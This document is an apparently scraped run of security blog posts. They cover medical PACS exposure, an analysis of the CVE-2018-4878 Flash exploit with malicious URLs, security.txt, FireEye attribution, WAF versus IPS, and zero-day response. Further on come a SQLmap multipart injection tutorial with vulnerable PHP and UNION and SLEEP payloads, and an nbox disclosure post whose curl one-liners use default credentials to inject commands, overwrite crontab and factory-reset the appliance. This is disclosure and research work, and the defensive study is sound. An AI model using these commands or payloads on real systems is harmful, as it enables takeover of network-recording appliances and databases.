When we began our investigation into the security status of medical imaging systems, we never expected we would conclude by reconstructing body parts. The amount of old software used in implementations of PACS servers and the amount of vulnerabilities discovered within the software itself are concerning. We investigated relatively few open-source vendors, but it begs the question: What more could we have found if we had access to professional hardware and software?

Default accounts, cross-site scripting, or vulnerabilities in the web server could lead to access to the systems. Our research demonstrates that once inside the systems, the data and pictures can be permanently altered.

In May 2017, one report claimed that through artificial intelligence pictures could be studied to determine how long a person will live. What if criminals could obtain that information and use it for extortion?

We understand the need for quickly sharing medical data for diagnosis and treatment and for storing medical images. We advise health care organizations to be careful when sharing images on open directories for research purposes and to at least scrape the PII data from the images.

For organizations using a PACS, ask your vendor about its security features. Employ a proper network design in which the sharing systems are properly secured. Think not only about internal security but also about the use of VPNs and two-factor authentication when connecting with external systems.

 

For more on the health care industry follow @McAfee_Labs and catch up on all threats statistics from Q417 in the March Threats Report.

The post McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals appeared first on McAfee Blogs.

How Hackers Bypassed an Adobe Flash Protection Mechanism

The number of Flash Player exploits has recently declined, due to Adobe’s introduction of various measures to strengthen Flash’s security. Occasionally, however, an exploit still arises. On January 31, Kr-Cert reported a zero-day vulnerability, identified as CVE-2018-4878, being exploited in the field. (Adobe has released an update to fix this flaw.) We analyzed this vulnerability and found that it bypassed the byte array mitigation feature that was introduced to prevent “length corruption” attacks in Flash. This post will focus on how the exploit bypasses the length checks.

 

How the Exploit Works

This exploit has been used in targeted attacks and arrives as a Microsoft Office Excel file with an embedded Flash file. On opening the Excel file, the Flash file contacts a server and requests a key. Once the key is received, the file decodes another embedded Flash file, which is the actual exploit.

The key is 100 bytes. It decodes and loads the embedded file using the loader.loadbyte function:

Because the URL for the key was offline, we could not retrieve it. But the sample hash was available online on various sites. We analyzed the sample (SHA-256) 1a3269253784f76e3480e4b3de312dfee878f99045ccfd2231acb5ba57d8ed0d.

This Adobe .SWF file contained multiple ActionScript 3 files as well as two embedded files in the BinaryData section, constituting the shellcode (marked in red in the following screen):

The Exploit in Action

When launched, the exploit checks if the system is running Windows. If so, it triggers the vulnerability.

As we see in the preceding image, the exploit takes several steps:

  • It creates a mediaplayer object
  • It initializes the drmManager property of mediaplayer to a specially crafted class based on the DRMOperationCompleteListener object nugamej.
  • The object nugamej is “freed,” but the drmManager points to the same memory location that nugamej used previously

If we take a close look at nugamej, we can see that it was created from the class Rykim, which implements the DRMOperationCompleteListener class. The Rykim class has various “uint” variables with values set as 0x1111, 0x2222, etc.:

These variables will be used later to access various addresses in the process space and other operations.

The exploit then causes an exception by using Localconnection().connect, creates the new variable “katyt” of the Rykim class, and implements the DRMOperationCompleteListener class. A time check calls the function “cysit”:

Cysit checks whether the newly allocated object’s a1 variable is 0x1111. If the value is not equal to 0x1111, then cysit stops the timer and proceeds with the exploitation.

The exploit creates another object, “kebenid” of the type “Qep,” which extends the byte array class. The length of kebenid is set to 512 bytes. This will be modified later to make a read-write primitive to gain unrestricted access to process memory.

Byte Array Checks to Avoid Corruption

We can see the structure of the byte array from https://github.com/adobe/avmplus/blob/master/core/ByteArrayGlue.h.

We can see that the byte array class has array, capacity, and length. In the past we have seen attackers corrupting the length variable to arbitrarily read and write to a memory location. Thus there is an extra check to ensure the integrity of the byte array. The check creates a secret value that is XORed with array/capacity/length and saved in the variables check_array/check_capacity/check_length.

When these variables are accessed, they are XORed with the secret key and their value is compared to the values stored in check_array/check_capacity/check_length. If they match, then we have genuine data; otherwise it will throw an error as in the following image:

Bypassing the Checks

From the preceding code, we can retrieve the key by simply using any of the following calculations:

If the value of copyOnWrite is 0, then the key will be check_copyOnWrite.

If we look carefully, we see both the katyt and kebenid object variables point to same memory locations. This can be confirmed If we print and compare the variables of the two objects.

Comparing the following variables with the byte array structure, as previously mentioned, we get the following:

So if we change katyt.a24 and katyt.a25, that will actually change the byte array capacity and byte array length. Then we just need to find the XOR key and we can set it to any length we want.

Thus in this exploit the key is found using the logic Array ^ check_array = key.

Once the key is available, we can easily modify the byte array capacity and length to 0xFFFFFFFF and check_length, thus bypassing the byte array security mitigations, and we can read or write anywhere in the process space:

Code Execution

The exploit uses the preceding read-write primitive, gained through the byte array object, to read memory and search for kernel32.dll and functions such as VirtualProtect, and CreateProcessA. Once the addresses of these functions are located, shellcode can be executed on the system. This technique is very well documented online. The following screen shot shows the code responsible for searching kernel32.dll, later locating the VirtualProtect API address as 0x75ff2c15:

The exploit later executes the shellcode and connects to a URL:

It also launches cmd.exe using CreateProcessA:

The shellcode also checks for some antimalware products:

Conclusion

Attackers constantly search for ways to bypass new protection mechanisms. This exploit shows one such way. As always, we advise readers to be careful when opening unknown attachments and documents received in email.

McAfee Network Security Platform customers are protected from this vulnerability through signature ID: 0x45223900.

 

Hash

SHA-256: 1a3269253784f76e3480e4b3de312dfee878f99045ccfd2231acb5ba57d8ed0d

URLs

  • hxxp://www.korea-tax.info/main/local.php
  • hxxp://www.1588-2040.co.kr/conf/product_old.jpg
  • hxxp://1588-2040.co.kr/conf/product.jpg

 

The post How Hackers Bypassed an Adobe Flash Protection Mechanism appeared first on McAfee Blogs.

Implement “security.txt” to advocate responsible vuln. disclosures

Implement

After discussing CAA record in DNS to whitelist your certificate authorities in my previous article, do you know it's a matter of time that someone finds an issue with your web-presence, website or any front-facing application? If they do, what do you expect them to do? Keep it under the wrap, or disclose it to you "responsibly"? This article is for you if you advocate the responsible disclosure; else, you have to do catch up with reality (I shall come back to you later!). Now, while we are on responsible disclosure, the "well-behaved" hackers or security researchers can either reach you via bug-bounty channels, your info@example email (not recommended), social media, or would be struggling to find a secure channel. But, what if you have a way to broadcast your "security channel" details to ease out their communication, and provide them with a well documented, managed and sought out conversation channel? Isn't that cool? Voila, so what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?." But, where would you host this page - under contact-us, security, information, about-us etc.? This is the very issue that security.txt evangelists are trying to solve - standardize the file, path and it's presence as part of RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in early stages[1], but is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, it very well advocates that you take security seriously, and are ready to have an open conversation with the security community if they want to report a finding, vulnerability or a security issue with your website/ application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As the security.txt follows a standard here are some points to consider,

  • The file security.txt has to be placed in .well-known directory under your domain parent directory, i.e. example.com/.well-known/security.txt
  • It documents the following fields,
    • Comments: The file can have information in the comment section that is optional. The comments shall begin with # symbol.
    • Each separate field needs a new line to define and represent.
    • Contact: This field can be an email address, phone or a link to a page where a security researcher can contact you. This field is mandatory and MUST be available in the file. It should adhere to RFC3986[3] for the syntax of email, phone and URI (MUST be served over HTTPS). Possible examples are,
      Contact: mailto:security@example.com.
      Contact: tel:+1-201-555-0123
      Contact: https://example.com/security-contact.html
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key, but a URI to the key-file.
    • Signature: If you want to show the file integrity, you can use this directive to link to the signature of the file. Each of the signature files must be named as security.txt.sig and accessible at /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This derivative can be used to acknowledge the previous researchers, and findings. It should contain company and individual names.
    • Hiring: Wanna hire people? Then, this is the place you post.

A reference security.txt extracted from Google,

Contact: https://g.co/vulnz
Contact: mailto:security@google.com
Encryption: https://services.google.com/corporate/publickey.txt
Acknowledgement: https://bughunter.withgoogle.com/
Policy: https://g.co/vrp
Hiring: https://g.co/SecurityPrivacyEngJobs

Hope this articles gives you an idea of implementing security.txt file, and the very importance of it.

Stay safe!


  1. Early drafted posted for RFC review: https://tools.ietf.org/html/draft-foudil-securitytxt-03 ↩︎

  2. Google security.txt file: https://www.google.com/.well-known/security.txt ↩︎

  3. Uniform Resource Identifier: https://tools.ietf.org/html/rfc3986 ↩︎

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.

Recommendations

Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

WAF and IPS. Does your environment need both?

WAF and IPS. Does your environment need both?

I have been in fair amount of discussions with management on the need for WAF, and IPS; they often confuse them and their basic purpose. It has been usually discussed after a pentest or vulnerability assessment, that if I can't fix this vulnerability - shall I just put an IPS or WAF to protect the intrusion/ exploitation? Or, sometimes they are considered as the silver bullet to thwart off the attackers instead of fixing the bugs. So, let me tell you - This is not good!

The security products are well suited to protect from something "unknown" or something that you have "unknowingly missed". It is not a silver bullet or an excuse to keep systems/ applications unpatched.

Security shouldn't be an AND/OR case. More the merrier only if they have been configured properly and each one of the product(s) has a different role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS - it's time to understand it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape - it's more complex to protect than it was 5 years ago. Attackers are running at your pace, if not faster & a step ahead. These adversary as well piggy-back existing threats to launch their exploits. Often something that starts as simple as DDOS to overwhelm your networks, concedes in an application layer attack. So, network firewall, application firewall, anti-malware, IPS, SIEM etc. all have an important task and should be omnipresent with bells and whistles!

Nevertheless, whether it's a WAF or an IPS; each has it's own purpose and though they can't replace each other, they often have gray areas under which you can rest your risks. This blog will try to address these gray areas, and the associated differences to make life easier when it comes to WAF (Web Application Firewall) or IPS (Intrusion Prevention System). The assumption is both are modern products, and the IPS have deep packet inspection capabilities. Now, let's try to understand the infrastructure, environment and scope of your golden eggs before we can take a call which is the best way to protect the data,

  1. If you are protecting only the "web applications" running on HTTP sockets, then WAF is enough. IPS will be cherry on cake.
  2. If you are protecting all sorts of traffic - SSH, FTP, HTTP etc. then WAF is of less use at it can't inspect non HTTP traffic. I would recommend having a deep packet inspection IPS.
  3. WAF must not be considered as an alternative for traditional network firewalls. It works on the application layer and hence is primarily useful on HTTP, SSL (decryption), Javascript, AJAX, ActiveX, Session management kind of traffic.
  4. A typical IPS does not decrypt SSL traffic, and therefore is insufficient in packet inspection on HTTPS session.
  5. There is wide difference in the traffic visibility and base-lining for anomalies. While WAF has an "understanding" of traffic - HTTP GET, POST, URL, SSL etc. the IPS only understands it as network traffic and therefore can do layer 3/4 checks - bandwidth, packet size, raw protocol decoding/ anomalies but not the GET/ POST or session management.
  6. IPS is useful in cases where RDP, SSH or FTP traffic has to be inspected before it reaches the box to make sure that the protocol is not tampered or wrapped with another TCP packet etc.

Both the technologies have matured and have many gray areas of working but understand that WAF knows and capture the contents of HTTP traffic to see if there is a SQL injection, XSS or cookie manipulation but the IPS have very little or no understanding of the underlying application, therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is getting confidential data out, or even sending a harmful parameter to your application - it will let it through if it's a valid HTTP packet.

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach in security. How to make sure the network, and application is resilient to complex attacks and threats lurking at your perimeter, or inside.

Be safe.

I know I haven’t patched yet, and there’s a zero-day knocking at my door

I know I haven't patched yet, and there's a zero-day knocking at my door

Patching is important, but let's agree it takes time. It takes time to test & validate the patch in your environment, check the application compatibility with the software and the underlying services. And then, one fine day, an adversary just hacks your server due to this un-patched code while you are testing it. It breaks my heart and I wonder "what can be done in the delta period while the team is testing the patch"? Adversary on the other hand is busy either reversing the patch, or using a zero-day to attack the systems! I mean once a patch is released it's a race,

Either bad guys reverse it and release a working exploit, OR good guys test, verify and update their environment. A close game, always.

Technically, I wouldn't blame the application security team, or the one managing the vulnerable server. They have their SLA to apply updates on the OS or Application Servers. In my experience, a high severity patch has to be applied in 15 days, medium in 30 days, and low in 45 days. Now, if the criticality is too severe; it can should be managed in 24 to 48 hours with enough testing on functionality, compatibility, and test cases with application team; or server management team. Now, what to do when there is a zero-day exploit lurking in your backyard? It used to be a low-probability gamble, but now it's getting more realistic and frequent. The recent case of Apache Struts vulnerability has done enough damage for many big companies like Equifax. I already addressed this issue in a blog-post before, and the need for alternatives such as WAF in Secure SDLC.

What shall I do if there's a 0-day lurking in my backyard?

Yes, I know there's a zero day for your web-application or underlying server, and you are busy patching but what other security controls do you have in place?
Ask yourself these questions,

  1. Do I have understanding of the zero-day exploit? Is it affecting my application, or a particular feature?
  2. Do I have a product/ tool for prevention at the application layer for network perimeter that can filter bad requests - Network WAF (Web Application Firewall), Network IPS (Intrusion Prevention System) etc.?
  3. Do I have a product/ tool for prevention at the application layer for host - Host based IPS, WAF etc.
  4. Can I just take the application offline, while I patch?
  5. What's the threat model and risk appetite if the exploitation is successful?
  6. Can I brace for impact by lowering the interaction with other components, or by preventing it to spread across my environment?

Let's understand how these answers will support your planning to develop a resilient environment,

>> Understanding of the zero-day exploit

You know there's an exploit in the wild; but does your security team or devops guys take a look at it? Did they find the exploit and understood the impact on your application? It is very important to understand what are you dealing with before you plan to secure your environment. Not all exploits are in scope of your environment due to the limitations, frameworks, plugins etc. So, do research a bit, ask questions and accordingly work on your timelines. Best case, understand the pattern you have to protect your application from.

>> Prevention at the application layer for network perimeter

If you know what's coming to hit you, you can plan a strategy to block it as well. Blocking is more effective when it's at the perimeter - earlier the better. And, if you have done good research on the exploit, or the threat-vector that can affect you; please take a note of the pattern and find a way to block it at the perimeter while you patch the application.

>> Prevention at the application layer for host

There are sometimes even when you know the pattern, and the details on the exploit but still network perimeter is incapable of blocking it. Example, if the SSL offload is on the server/ load balancer. In this case make sure the server knows what is expected; blocks everything else including an anomaly. This can be achieved by Host based protection: IPS, or WAF.
Even a small thing like tripwire can monitor the directory, and files to make sure attacker is either not able to create files; or you get the alert at the right time to react. This can make a huge difference!

Note: Make sure the IPS (network/ host) is capable of in-depth packet filtering. If the pattern can be blocked on the WAF with a quick rule, do it and make sure it doesn't generate false positives which can impact your business. Also, do monitor the WAF for alerts which can tell you if there have been failed attempts by the adversaries. Remember, the attackers won't directly use their best weapon; usually it starts with "information gathering", or uploading files, or executing known exploits before customizing the case for their needs.

You have very high chances to detect adversaries while they are gathering insights about you. Keep a keen eye on any alert from production environment.

>> Taking application offline

Is it possible to take the offline while you patch the software? This depends on the fact what's the exposure of the application, what is the kind of CIA (Confidentiality, Integrity and Availability) rating and what kind of business impact assessment has been performed. If you think that taking it offline can speed up the process, and also reduce the exposure without hurting your business; do it. Better safe than sorry.

>> Threat model and risk appetite

You have to assess & perform threat modeling of the application. The reason it is required is not every risk is high. Not every application needs the same attention, and the vulnerable application may well be internal that will substantially reduce the exposure and underlying impact! Do ask your team - is the application Internet facing, how many users are using it, what kind of data is it dealing with etc. and act accordingly.

>> Brace for impact

Finally, if things still look blurred, start prepping yourself for impact. Try to minimize it by validating and restricting the access to the server. You can perform some sanity checks, and implement controls like,

  1. Least privilege accounts for application use
  2. Least interaction with the rest of production environment
  3. Restricted database requests and response to limit the data ex-filtration
  4. Keep the incident management team on high-alert.
Incident management - Are you sure you are not already breached?

Now, what are the odds that while you reading this blog, trying to answer all the questions and getting ready - you haven't already been compromised? Earlier such statement of incidents used to begin with "What if..." but now it says "When..." so, yeah make sure all your monitoring systems are reporting the anomalies and someone is monitoring it well. These tools are only good if some human being is responsibly validating the alerts. Once an alert is flagged red; a process should trigger to analyze and minimize the impact.
Read more about incident monitoring failures in my earlier blogpost. Don't be one of them.

Now, once you address these questions you must have a fairly resilient environment to either mitigate or absorb the impact. Be safe!

Sql Injection using SQLmap with multipart/form-data Encoding

I’ve spent a fair amount of my time examining code for vulnerabilities, I recently began to focus specifically on SQL injection. While investigating this specific type of vulnerability in web applications, I ran across a few examples where the injection point was in a POST request but it wasn’t your straightforward content-type application/x-www-form-urlencoded form.  The injection point was being passed as an array via POST and  processed inside of a foreach loop:

$person_name= $_POST['person']; 
foreach($person_name as $person => $value) { 
 $query = "select * from v_entry where vdbid = $value"; 
 $result = mysql_query($query); 
 $num = mysql_numrows($result); 
 $x=0; 
while ($num > $x) {   
 echo "<br>";    
 echo mysql_result($result,$x,1);    
 $x++;
 } 
}


The HTML form specified the encoding type as  ‘multipart/form-data’

A packet capture with tcpdump for the original form post and then my first attempt with SQLmap will easily display the differences below:

 # tcpdump -Xvvv port 80

POST: /post_sqli_research/form.php HTTP/1.1 
 Host: example.com
 Connection: keep-alive
 Content-Length: 591
 Cache-Control: max-age=0
 Origin: http://example.com
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla...
 Referer: http://example.com/post_sqli_research/form.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.8

 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 
 Add Person

And the tcpdump output with a generic attempt using SQLmap:

 
 POST /post_sqli_research/form.php HTTP/1.1
 Content-Length: 135
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip,deflate
 Host: example.com
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 User-Agent: sqlmap/1.0.8.2#dev (http://sqlmap.org)
 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Connection: close
 Pragma: no-cache
 Cache-Control: no-cache,no-store
 Content-Type: application/x-www-form-urlencoded; charset=utf-8
 
 Person%5BPerson_name%5D=%20UNION%20ALL%20SELECT%20NULL%23&Person%5BPerson_contact%5D=1&Person%5BPerson_email%5D=1&Person%5Bdescription%5D=1%22[!http]

We see the Content-Type encoding isn’t what the form is expecting. I’ll clean up and modify the TCP-dump output to add a ‘*’ where we think the injection point is.  I’ll then save it in a file called request.txt and then supply that as an argument to -r REQUESTFILE in SQL map.  It should look similar to the output below:

$ cat request.txt
 
 POST /post_sqli_research/test.php HTTP/1.1
 Host: example.com
 Connection: keep-alive
 Content-Length: 591
 Cache-Control: max-age=0
 Origin: http://example.com
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla...
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 Referer: http://example.com/post_sqli_research/form.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.8
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1*
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2--

I’ll specify the parameter on the SQLmap command line where we placed a ‘*’ in the input to mark our suspected injection point with -p TESTPARAMETER.  I mentioned above that -r tells SQLmap to use the format specified in that file to generate the request.

 $ sqlmap  -r request.txt -p "Person[Person_name]" --level 2 --risk 2
 .
 .
 .
 
 [11:40:13] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
 sqlmap identified the following injection point(s) with a total of 373 HTTP(s) requests:
 
 ---
 
 Parameter: #1* ((custom) POST)
 
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 Payload: ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1 AND (SELECT * FROM (SELECT(SLEEP(5)))GrGB)
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2--
     Type: UNION query
 
     Title: Generic UNION query (NULL) - 19 columns
 
     Payload: ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1 UNION ALL SELECT NULL,CONCAT(0x7170787671,0x534c744f4a7043446e4c6c55596b634b61624c6d55686e546272756b736a4e6973544979686c746c,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kVed
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 
 Content-Disposition: form-data; name="Person_create"
 
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2-----
 [11:40:15] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Debian 8.0 (jessie)
 web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12
 
 [11:40:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
 [*] shutting down at 11:40:15

Above we see in the SQLmap output that it confirms our injection point is exploitable.

Conclusion

As a vulnerability researcher, I run across all sorts of interesting code and ways to exploit it.  It’s always a learning experience, this is one of the reasons why I try to spend some time each week hunting for bugs.  I enjoy the discovery and exploitation while learning new things along the way.

The post Sql Injection using SQLmap with multipart/form-data Encoding appeared first on Liquidmatrix Security Digest.

Got any RCEs?

Security is a boomin’, and so there are many different appliances to protect your network. Some of them do very little to protect, some of them open new holes in your network.

In line with best practice, many Security teams capture all network traffic using a variety of solutions, some closed, some open source. Once the traffic is stored, it can be used to detect badness, or just examine traffic patterns on corporate assets.

One of these open source options is NTOP, which of course has an appliance version, called nbox recorder.  It goes without saying, if this traffic data were to be exposed, the consequences could be catastrophic. Consider stored credentials, authentication data, PII, internal data leakage...
pcap_tee.png
PCAP or it didn't happen

You can either buy a ready-to-go appliance or with some drudge work you can build your own. Just get a license for nbox and just put it into a Linux box, they are nice like that providing all the repositories and the steps are simple and easy to follow. Just spin up an Ubuntu VM and run:


wget http://apt.ntop.org/14.04/all/apt-ntop.deb
sudo dpkg -i apt-ntop.deb
sudo apt-get clean all
sudo apt-get update
sudo apt-get install -y pfring nprobe ntopng ntopng-data n2disk cento nbox





BOOM! You are ready to go. Now you have a nbox recorder ready to be used. And abused!
The default credentials are nbox/nbox and it does use Basic Auth to be accessed.

Before I continue, imagine that you have this machine capturing all the traffic of your network. Listening to all your corporate communications or production traffic and storing them on disk. How bad would it be if an attacker gets full access to it? Take a minute to think about it.


nervs.gif
Uh-oh...
This level of exposure caught my eye, and I wanted to verify that having one of these sitting in your network does not make you more exposed. Unfortunately, I found several issues that could have been catastrophic with a malicious intent.

I do believe in the responsible disclosure process, however after repeatedly notifying both ntop and MITRE, these issues were not given high priority nor visibility. The following table details the timeline around my disclosure communications: 

Disclosure Timeline

12/27/2014 - Sent to ntop details about some nbox vulnerabilities discovered in version 2.0
01/15/2015 - Asked ntop for an update about the vulnerabilities sent
01/16/2015 - Requested by ntop the details again, stating they may have been fixed
01/18/2015 - Sent for a second time the vulnerabilities details. Mentioned to request CVEs
05/24/2015 - Asked ntop for an update about the vulnerabilities sent and to request CVEs
01/06/2016 - Noticed new nbox version is out (2.3) and found more vulnerabilities. Old vulnerabilities are fixed. Sent ntop an email about new issues and to request CVEs
01/06/2016 - Quick answer ignoring my request for CVEs and just asking for vulnerabilities details.
01/28/2016 - Sent request for CVEs to MITRE, submitting a full report with all the issues and steps to reproduce.
02/17/2016 - Asked MITRE for an update on the issues submitted.
02/17/2016 - Reply from MITRE: “Your request is outside the scope of CVE's published priorities. As such, it will not be assigned a CVE-ID by MITRE or another CVE CNA at this time.”

07/10/2016 - Noticed new nbox version (2.5) with partial fixes for some vulnerabilities in the previous (2.3) version

The ntop team initially refused to comment and silently fixed the bugs. MITRE then said this wasn't severe enough to warrant a CVE. As such, I have now chosen to highlight the issues here in an effort to have them remediated. I again want to highlight that I take this process very seriously, but after consulting with multiple other individuals, I feel that both the ntop team and MITRE have left me no other responsible options.
neotrain1.jpg
Here comes the paintrain!

*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:


RCE: POST against https://NTOP-BOX/ntop-bin/write_conf_users.cgi with parameter cmd=touch /tmp/HACK

curl -sk --user nbox:nbox --data 'cmd=touch /tmp/HACK' 'https://NTOP-BOX/ntop-bin/write_conf_users.cgi'


RCE: POST against https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi with parameters interface=;touch /tmp/HACK;


curl -sk --user nbox:nbox --data 'interface=;touch /tmp/HACK;' 'https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi'


RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap


curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap'


RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22


curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22'

RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200

curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'

There are some other interesting things, for example, it was possible to have a persistent XSS by rewriting crontab with a XSS payload on it, but they fixed it in 2.5. However the crontab overwrite (Wrapped in sudo) is still possible:

GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'

The last one is a CSRF that leaves the machine fried, by resetting the machine completely:
GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'


To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)


And you can run the checker.sh to check for all the above attacks. Pull requests are welcome if you find more!



Screen Shot 2016-07-26 at 10.00.27.png





nodding.gif





(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)

Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...

If you have any questions or feedback, hit me up in twitter (@javutin)!

Have a nice day!


Statement: Smoothwall and the "FREAK" Vulnerability

